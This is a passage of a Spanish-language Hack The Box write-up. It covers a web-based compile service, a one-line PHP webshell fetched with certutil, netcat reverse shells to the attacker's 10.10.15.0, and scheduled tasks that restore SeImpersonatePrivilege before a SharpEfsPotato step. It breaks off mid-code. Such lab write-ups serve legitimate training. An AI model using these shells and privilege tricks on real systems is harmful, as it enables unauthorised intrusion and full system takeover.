seconds </span></span></span><span class="line"><span class="cl"><span class="cp"> header(&#34;refresh: $refreshInterval&#34;); </span></span></span><span class="line"><span class="cl"><span class="cp">} </span></span></span><span class="line"><span class="cl"><span class="cp">?&gt;</span> </span></span><span class="line"><span class="cl"><span class="p">&lt;</span><span class="nt">a</span> <span class="na">href</span><span class="o">=</span><span class="s">&#34;/index.php&#34;</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;return-btn&#34;</span><span class="p">&gt;</span>Return to homepage<span class="p">&lt;/</span><span class="nt">a</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="c1">// JavaScript code </span></span></span><span class="line"><span class="cl"> <span class="c1">// Function to toggle the visibility of the code block </span></span></span><span class="line"><span class="cl"> <span class="kd">function</span> <span class="nx">toggleCodeBlock</span><span class="p">()</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kd">var</span> <span class="nx">codeBlock</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s2">&#34;codeBlock&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nx">codeBlock</span><span class="p">.</span><span class="nx">style</span><span class="p">.</span><span class="nx">display</span> <span class="o">=</span> <span class="nx">codeBlock</span><span class="p">.</span><span class="nx">style</span><span class="p">.</span><span class="nx">display</span> <span class="o">===</span> <span class="s2">&#34;none&#34;</span> <span class="o">?</span> <span class="s2">&#34;block&#34;</span> <span class="o">:</span> <span class="s2">&#34;none&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">&lt;/</span><span class="nt">script</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"><span class="p">&lt;/</span><span class="nt">body</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"><span class="p">&lt;/</span><span class="nt">html</span><span class="p">&gt;</span> </span></span></code></pre></td></tr></table> </div> </div> </div> </div> <p>submit.php crea un nuevo directorio y hace una copia de vs_status e index.php, esto para el estado de la compilacion, ademas el archivo todo.txt segun parece sirve de referencia de que repositorios compilar.<br /> <div class="expand"> <button type="button" class="expand__button" aria-label="Expand Button"> <span class="expand-icon expand-icon__right"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="currentColor" d="M9.29 15.88L13.17 12 9.29 8.12c-.39-.39-.39-1.02 0-1.41.39-.39 1.02-.39 1.41 0l4.59 4.59c.39.39.39 1.02 0 1.41L10.7 17.3c-.39.39-1.02.39-1.41 0-.38-.39-.39-1.03 0-1.42z"/></svg> </span> submit.php </button> <div class="expand__content"> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="o">&lt;?</span><span class="nx">php</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="p">(</span><span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">&#39;REQUEST_METHOD&#39;</span><span class="p">]</span> <span class="o">==</span> <span class="s1">&#39;POST&#39;</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nv">$gitRepoLink</span> <span class="o">=</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">&#39;gitRepoLink&#39;</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1">// Sanitize URL </span></span></span><span class="line"><span class="cl"> <span class="nv">$gitRepoLink</span> <span class="o">=</span> <span class="nx">filter_var</span><span class="p">(</span><span class="nv">$gitRepoLink</span><span class="p">,</span> <span class="nx">FILTER_SANITIZE_URL</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1">// Validate URL </span></span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">filter_var</span><span class="p">(</span><span class="nv">$gitRepoLink</span><span class="p">,</span> <span class="nx">FILTER_VALIDATE_URL</span><span class="p">))</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">echo</span> <span class="s1">&#39;&lt;script&gt;alert(&#34;Invalid URL&#34;); window.location = &#34;/index.php&#34;;&lt;/script&gt;&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">exit</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1">// Check scheme </span></span></span><span class="line"><span class="cl"> <span class="nv">$parsed_url</span> <span class="o">=</span> <span class="nx">parse_url</span><span class="p">(</span><span class="nv">$gitRepoLink</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="nv">$parsed_url</span> <span class="o">===</span> <span class="k">false</span> <span class="o">||</span> <span class="o">!</span><span class="nx">in_array</span><span class="p">(</span><span class="nv">$parsed_url</span><span class="p">[</span><span class="s1">&#39;scheme&#39;</span><span class="p">],</span> <span class="p">[</span><span class="s1">&#39;http&#39;</span><span class="p">,</span> <span class="s1">&#39;https&#39;</span><span class="p">]))</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">echo</span> <span class="s1">&#39;&lt;script&gt;alert(&#34;Unsupported URL scheme&#34;); window.location = &#34;/index.php&#34;;&lt;/script&gt;&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">exit</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nv">$randV</span> <span class="o">=</span> <span class="nx">bin2hex</span><span class="p">(</span><span class="nx">random_bytes</span><span class="p">(</span><span class="mi">15</span><span class="p">));</span> <span class="c1">// Generate a random variable. </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nv">$uploadPath</span> <span class="o">=</span> <span class="s1">&#39;C:\\xampp\\htdocs\\uploads\\&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nv">$todoFilePath</span> <span class="o">=</span> <span class="nv">$uploadPath</span> <span class="o">.</span> <span class="s1">&#39;todo.txt&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nv">$newDirPath</span> <span class="o">=</span> <span class="nv">$uploadPath</span> <span class="o">.</span> <span class="nv">$randV</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1">// Write to file </span></span></span><span class="line"><span class="cl"> <span class="nv">$fileContent</span> <span class="o">=</span> <span class="s2">&#34;Git Repo Link: </span><span class="si">$gitRepoLink</span><span class="s2">, Random Variable: </span><span class="si">$randV</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nx">file_put_contents</span><span class="p">(</span><span class="nv">$todoFilePath</span><span class="p">,</span> <span class="nv">$fileContent</span><span class="p">,</span> <span class="nx">FILE_APPEND</span> <span class="o">|</span> <span class="nx">LOCK_EX</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1">// Create a new directory </span></span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">is_dir</span><span class="p">(</span><span class="nv">$newDirPath</span><span class="p">))</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nx">mkdir</span><span class="p">(</span><span class="nv">$newDirPath</span><span class="p">,</span> <span class="k">true</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1">// Copying vs_status.php to the directory, which displays compile status </span></span></span><span class="line"><span class="cl"> <span class="nv">$sourceFile</span> <span class="o">=</span> <span class="s1">&#39;C:\\xampp\\htdocs\\vs_status.php&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nv">$destinationFile</span> <span class="o">=</span> <span class="nv">$newDirPath</span><span class="o">.</span><span class="s1">&#39;\\index.php&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="nx">copy</span><span class="p">(</span><span class="nv">$sourceFile</span><span class="p">,</span> <span class="nv">$destinationFile</span><span class="p">))</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">echo</span> <span class="s1">&#39;[+] File copied successfully.&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">echo</span> <span class="s1">&#39;[-] Unable to copy the file.&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1">// Redirect to the new directory </span></span></span><span class="line"><span class="cl"> <span class="nx">header</span><span class="p">(</span><span class="s1">&#39;Location: /uploads/&#39;</span> <span class="o">.</span> <span class="nv">$randV</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="cp">?&gt;</span><span class="err"> </span></span></span></code></pre></td></tr></table> </div> </div> </div> </div></p> <h2 id="local-service">Local Service</h2> <p>Descargamos una pequena webshell en la carpeta del sitio.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs&gt; certutil -urlcache -split -f http://10.10.15.0/file.php file.php </span></span><span class="line"><span class="cl">**** Online **** </span></span><span class="line"><span class="cl"> <span class="m">0000</span> ... </span></span><span class="line"><span class="cl"> 001e </span></span><span class="line"><span class="cl">CertUtil: -URLCache <span class="nb">command</span> completed successfully. </span></span><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs&gt; cat file.php </span></span><span class="line"><span class="cl">&lt;?php </span></span><span class="line"><span class="cl">echo<span class="o">(</span>system<span class="o">(</span><span class="nv">$_GET</span><span class="o">[</span>0<span class="o">]))</span><span class="p">;</span> </span></span><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Tras ejecutar un whoami vemos que el servicio httpd esta corriendo como local service.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/www ❯ curl -s <span class="s2">&#34;http://10.10.11.234/file.php?0=whoami&#34;</span> </span></span><span class="line"><span class="cl">nt authority<span class="se">\l</span>ocal service </span></span><span class="line"><span class="cl">nt authority<span class="se">\l</span>ocal service </span></span><span class="line"><span class="cl"> π ~/htb/www ❯ </span></span></code></pre></td></tr></table> </div> </div><p>Observamos que tiene algunos privilegios.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/www ❯ curl -s <span class="s2">&#34;http://10.10.11.234/file.php?0=whoami%20/priv&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PRIVILEGES INFORMATION </span></span><span class="line"><span class="cl">---------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Privilege Name Description <span class="nv">State</span> </span></span><span class="line"><span class="cl"><span class="o">=============================</span> <span class="o">==============================</span> <span class="o">========</span> </span></span><span class="line"><span class="cl">SeChangeNotifyPrivilege Bypass traverse checking Enabled </span></span><span class="line"><span class="cl">SeCreateGlobalPrivilege Create global objects Enabled </span></span><span class="line"><span class="cl">SeIncreaseWorkingSetPrivilege Increase a process working <span class="nb">set</span> Disabled </span></span><span class="line"><span class="cl">SeIncreaseWorkingSetPrivilege Increase a process working <span class="nb">set</span> Disabled </span></span><span class="line"><span class="cl"> π ~/htb/www ❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="privileges-back">Privileges Back</h2> <p>Un post de <a href="https://itm4n.github.io/localservice-privileges/#reproducing-the-conditions-of-the-exploit">itm4n - Give Me Back My Privileges! Please?</a>, explica un caso en el que el usuario <code>NT AUTHORITY\LOCAL SERVICE</code> no tiene el privilegio <code>SeImpersonatePrivilege</code> algo que seria &ldquo;normal&rdquo; en este usuario y, se muestra como obtener devuelta este y otros privilegios creando un task (<a href="https://juggernaut-sec.com/seimpersonateprivilege/">SeImpersonatePrivilege</a> es un privilegio que nos permitiria escalar privilegios).</p> <p>Para poder obtener este privilegio necesitamos ejecutar la task, para ello ejecutamos una shell inversa utilizando netcat, el cual descargamos en la maquina. Esta shell ahora es local service.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># http://10.10.11.234/uploads/file.php?0=C:/Users/Public/Documents/nc.exe%20-e%20powershell%2010.10.15.0%201336</span> </span></span><span class="line"><span class="cl"> π ~/htb/visual ❯ rlwrap nc -lvp <span class="m">1336</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1336</span> ... </span></span><span class="line"><span class="cl">10.10.11.234: inverse host lookup failed: Unknown host </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.15.0<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.234<span class="o">]</span> <span class="m">49744</span> </span></span><span class="line"><span class="cl">Windows PowerShell </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs&gt; whoami /priv </span></span><span class="line"><span class="cl">whoami /priv </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PRIVILEGES INFORMATION </span></span><span class="line"><span class="cl">---------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Privilege Name Description <span class="nv">State</span> </span></span><span class="line"><span class="cl"><span class="o">=============================</span> <span class="o">==============================</span> <span class="o">========</span> </span></span><span class="line"><span class="cl">SeChangeNotifyPrivilege Bypass traverse checking Enabled </span></span><span class="line"><span class="cl">SeCreateGlobalPrivilege Create global objects Enabled </span></span><span class="line"><span class="cl">SeIncreaseWorkingSetPrivilege Increase a process working <span class="nb">set</span> Disabled </span></span><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs&gt; </span></span></code></pre></td></tr></table> </div> </div><h3 id="1-task">#1 Task</h3> <p>La primera task permite obtener de vuelta los privilegios de este usuario, sin embargo no todos estan presentes, el que nos interesa es <code>SeImpersonatePrivilege</code>.</p> <p>Task la cual ejecutaria una shell inversa.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nv">$TaskAction</span> <span class="o">=</span> New-ScheduledTaskAction -Execute <span class="s2">&#34;powershell.exe&#34;</span> -Argument <span class="s2">&#34;-Exec Bypass -Command `&#34;</span>C:/Users/Public/Documents/nc.exe -e powershell 10.10.15.0 1339<span class="sb">`</span><span class="s2">&#34;&#34;</span> </span></span><span class="line"><span class="cl">Register-ScheduledTask -Action <span class="nv">$TaskAction</span> -TaskName <span class="s2">&#34;task1&#34;</span> </span></span><span class="line"><span class="cl">Start-ScheduledTask -TaskName <span class="s2">&#34;task1&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Ejecucion de la task por el usuario local service.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs&gt; <span class="nv">$TaskAction</span> <span class="o">=</span> New-ScheduledTaskAction -Execute <span class="s2">&#34;powershell.exe&#34;</span> -Argument <span class="s2">&#34;-Exec Bypass -Command `&#34;</span>C:/Users/Public/Documents/nc.exe -e powershell 10.10.15.0 1339<span class="sb">`</span><span class="s2">&#34;&#34;</span> </span></span><span class="line"><span class="cl">Register-ScheduledTask -Action <span class="nv">$TaskAction</span> -TaskName <span class="s2">&#34;task1&#34;</span> </span></span><span class="line"><span class="cl">Start-ScheduledTask -TaskName <span class="s2">&#34;task1&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$TaskAction</span> <span class="o">=</span> New-ScheduledTaskAction -Execute <span class="s2">&#34;powershell.exe&#34;</span> -Argument <span class="s2">&#34;-Exec Bypass -Command `&#34;</span>C:/Users/Public/Documents/nc.exe -e powershell 10.10.15.0 1339<span class="sb">`</span><span class="s2">&#34;&#34;</span> </span></span><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs&gt; Register-ScheduledTask -Action <span class="nv">$TaskAction</span> -TaskName <span class="s2">&#34;task1&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">TaskPath TaskName State </span></span><span class="line"><span class="cl">-------- -------- ----- </span></span><span class="line"><span class="cl"><span class="se">\ </span> task1 Ready </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs&gt; Start-ScheduledTask -TaskName <span class="s2">&#34;task1&#34;</span> </span></span><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Obtenemos una shell con privilegios.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/visual ❯ rlwrap nc -nlvp <span class="m">1339</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1339</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.15.0<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.234<span class="o">]</span> <span class="m">49746</span> </span></span><span class="line"><span class="cl">Windows PowerShell </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; whoami /priv </span></span><span class="line"><span class="cl">whoami /priv </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PRIVILEGES INFORMATION </span></span><span class="line"><span class="cl">---------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Privilege Name Description <span class="nv">State</span> </span></span><span class="line"><span class="cl"><span class="o">=============================</span> <span class="o">===================================</span> <span class="o">========</span> </span></span><span class="line"><span class="cl">SeAssignPrimaryTokenPrivilege Replace a process level token Disabled </span></span><span class="line"><span class="cl">SeIncreaseQuotaPrivilege Adjust memory quotas <span class="k">for</span> a process Disabled </span></span><span class="line"><span class="cl">SeTcbPrivilege Act as part of the operating system Disabled </span></span><span class="line"><span class="cl">SeSystemtimePrivilege Change the system <span class="nb">time</span> Disabled </span></span><span class="line"><span class="cl">SeAuditPrivilege Generate security audits Disabled </span></span><span class="line"><span class="cl">SeChangeNotifyPrivilege Bypass traverse checking Enabled </span></span><span class="line"><span class="cl">SeCreateGlobalPrivilege Create global objects Enabled </span></span><span class="line"><span class="cl">SeIncreaseWorkingSetPrivilege Increase a process working <span class="nb">set</span> Disabled </span></span><span class="line"><span class="cl">SeTimeZonePrivilege Change the <span class="nb">time</span> zone Disabled </span></span><span class="line"><span class="cl">PS C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; </span></span></code></pre></td></tr></table> </div> </div><h3 id="2-task---seimpersonateprivilege">#2 Task - SeImpersonatePrivilege</h3> <p>En la segunda task se explica que es posible especificar los privilegios, sin embargo, encontramos que uno de estos privilegios no es asignado y por lo tanto no ejecuta la task, en tal caso unicamente especificamos <code>SeImpersonatePrivilege</code> como el unico privilegio.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="o">[</span>System.String<span class="o">[]]</span><span class="nv">$Privs</span> <span class="o">=</span> <span class="s2">&#34;SeImpersonatePrivilege&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$TaskPrincipal</span> <span class="o">=</span> New-ScheduledTaskPrincipal -UserId <span class="s2">&#34;LOCALSERVICE&#34;</span> -LogonType ServiceAccount -RequiredPrivilege <span class="nv">$Privs</span> </span></span><span class="line"><span class="cl"><span class="nv">$TaskAction</span> <span class="o">=</span> New-ScheduledTaskAction -Execute <span class="s2">&#34;powershell.exe&#34;</span> -Argument <span class="s2">&#34;-Exec Bypass -Command `&#34;</span>C:<span class="se">\u</span>sers<span class="se">\p</span>ublic<span class="se">\d</span>ocuments<span class="se">\n</span>c.exe -e cmd.exe 10.10.15.0 1339<span class="sb">`</span><span class="s2">&#34;&#34;</span> </span></span><span class="line"><span class="cl">Register-ScheduledTask -Action <span class="nv">$TaskAction</span> -TaskName <span class="s2">&#34;seimpersonate&#34;</span> -Principal <span class="nv">$TaskPrincipal</span> </span></span><span class="line"><span class="cl">Start-ScheduledTask -TaskName <span class="s2">&#34;seimpersonate&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Tras ejecutar la task obtuvimos una shell con el privilegio SeImpersonatePrivilege.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/visual ❯ rlwrap nc -lvp <span class="m">1339</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1339</span> ... </span></span><span class="line"><span class="cl">10.10.11.234: inverse host lookup failed: Unknown host </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.15.0<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.234<span class="o">]</span> <span class="m">49717</span> </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.17763.4840<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> <span class="m">2018</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt;whoami /priv </span></span><span class="line"><span class="cl">whoami /priv </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PRIVILEGES INFORMATION </span></span><span class="line"><span class="cl">---------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Privilege Name Description <span class="nv">State</span> </span></span><span class="line"><span class="cl"><span class="o">=======================</span> <span class="o">=========================================</span> <span class="o">=======</span> </span></span><span class="line"><span class="cl">SeChangeNotifyPrivilege Bypass traverse checking Enabled </span></span><span class="line"><span class="cl">SeImpersonatePrivilege Impersonate a client after authentication Enabled </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="sharpefspotato">SharpEfsPotato</h2> <p>Se puede aprovechar SeImpersonatePrivilege de distintos exploits tal y como se lista en <a href="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens#seimpersonateprivilege-3.1.1">SeImpersonatePrivilege (3.1.1)</a>, en este caso logramos ejecutar whoami con SharpEfsPotato.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" 